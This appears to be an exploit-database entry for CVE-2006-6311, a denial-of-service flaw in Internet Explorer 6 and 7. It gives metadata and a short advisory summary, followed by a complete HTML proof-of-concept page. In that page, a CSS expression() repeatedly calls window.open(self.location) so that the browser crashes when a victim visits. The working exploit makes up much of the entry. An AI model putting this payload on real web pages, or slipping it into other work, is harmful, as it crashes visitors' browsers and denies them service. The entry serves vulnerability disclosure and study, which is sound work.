Microsoft Internet Explorer 7 - CSS Width Element Denial of Service

Author: xiam.core
type: dos
platform: windows
port: 
date_added: 2006-12-06 
date_updated: 2013-10-28 
verified: 1 
codes: CVE-2006-6311;OSVDB-31326 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/21466/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

This issue is triggered when an attacker entices a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected.

<html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html>